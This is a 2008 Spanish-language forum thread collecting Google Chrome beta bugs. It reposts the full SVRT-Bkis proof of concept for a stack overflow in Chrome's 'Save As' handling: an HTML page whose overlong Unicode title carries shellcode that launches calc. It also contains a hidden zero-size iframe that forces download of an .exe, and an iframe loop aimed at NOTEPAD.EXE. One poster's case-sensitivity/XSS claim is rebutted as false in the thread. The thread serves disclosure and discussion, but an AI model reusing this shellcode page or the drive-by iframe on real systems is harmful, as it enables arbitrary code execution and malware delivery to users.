[°] Recopilatorio de Bugs/Exploits en Google Chrome win32

Iniciado por WHK, 3 Septiembre 2008, 00:45 AM

0 Miembros y 1 Visitante están viendo este tema.

Micah Genji

Vaya solo pense dar una vuelta por el foro para ver que opinaban sobre el nuevo explorador y a la vez lo rapido que se pudo encontrar bugs, si siguen asi en una semana quien sabe cuantos bugs vayan :)
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former : A.E

Littlehorse

#21
A mi la verdad que no me entra todavia en la cabeza como pudieron encontrar un bug como este  :-X :-\

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>


Es increible que a Google se le haya pasado algo asi. Esa mania de sacar betas/alpha sin ningun minimo testeo.



pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P
An expert is a man who has made all the mistakes which can be made, in a very narrow field.

WHK

#22
Citarpd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P

Mi firefox anda casi igual o mas rápido porque lo manejo en prioridad alta desde el administrador de tareas mientras hago mis trabajos y eso que todavía no se instalan plugines dentro del explorador de google porque ahi si va a pesar y va a tomar mas lentitud ya que si separa cada pestaña en un proceso diferente eso significa que debe iniciar el proceso de un plugin por cada pestaña adicional.

URL:
Citarabout:

Contenido:
Citar
Google Chrome
0.2.149.27 (1583)
Build oficial
Google Inc.
Copyright © 2006-2008 Google Inc. Todos los derechos reservados.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

El explorador se basa en el motor de Safri y no es propio como un amigo me habia comentado.



El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:
http://milw0rm.com/exploits/6365




Citarjavascript:Alert("test");
Citarjavascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citarjavascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.

hackeen


;D ;D ;D ;D ;D ;D ;D ;D ;D ;D



<html>
<script>
function down(){
document.write('<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" frameborder="0" width="0" height="0"></iframe>');
}
setInterval("down()",200)
</script>


;D ;D ;D ;D ;D ;D ;D ;D ;D ;D
=BHT=

Trancek

Y otro mas que hace uso de la funcion SaveAs, vamos que tienes que guardar la pagina en tu pc, y poca gente hace eso yo creo...

http://security.bkis.vn/

---
We tested Google Chrome 0.2.149.27 on Windows XP SP2 (Open Calculator)

http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html

berz3k

Este ultimo PoC "Save As" no me funciona, y ninguna calculadora o calc.exe se ejecuto, al solo me ocasiona el DoS y/o simplemente me cierra la app, esta raro el PoC



-berz3k.


WHK


WHK

desbordamiento de la memoria y la ejecución arbitraria de código..

Código (html4strict) [Seleccionar]
<html>
<head>
<!--
This file is saved as "Unicode" type because Chrome convert data (payload) to "Unicode" while handling. This PoC Code execute a calculator.

Here comes details :

We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27 and would like to inform you with this.

The vulnerability is caused due to a boundary error when handling the "SaveAs" function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users' systems.

To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.

Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.

Discoverer : Le Duc Anh - SVRT - Bkis
SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems...

Website : http://security.bkis.vn
Mail : svrt[at]bkav.com.vn
-->

<title>
瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉邐ଋ)邐邐邐邐邐邐邐邐줱⑴寴玁㘭荞ﳫ씐干ⷬᮽꛐ孊Ⲕ헙㖣ƽⳌ៝ᥧ徽ᰂ쟶ꥀ⫶叼ꫝ秗娒좙ƽⳈ㣝Ⅷ핽ㆳ딷ㅧ徽ꐇ穪鸇Ꚉ湶剎浧픺㆜햛▄埝굧庆ⷬ㚽狐ꠇ箌ꚿํ媼䖳ꂮ⍦ꅡ下㉗ⶏ帶AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</title>
</head>
<body>
Click 'Save As' function for checking this vulnerability.
Note: Opening multiple Calculators.

</body>
</html>


Fuentes:
http://seclists.org/bugtraq/2008/Sep/0070.html
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
http://milw0rm.com/exploits/6367

Trancek

berz3k es un stack-based buffer overflow, asi que usara algun Return Address que no este en tu sistema windows lo mas probable y por ello a lo mejor no te funcionara, digo yo..porque hay varias PoC, yo es que pase de bajarme todavia el Chrome, estoy agusto con firefox

sirdarckcat

Cita de: WHK en  5 Septiembre 2008, 05:47 AM
Citarjavascript:Alert("test");
Citarjavascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citarjavascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
Falso
prueba poniendo Alert(123) en firefox ;)

De lo del BoF, pues que cagado jajaja.. aunque si funciona tengo screenshots :¬¬ jaja

Saludos!!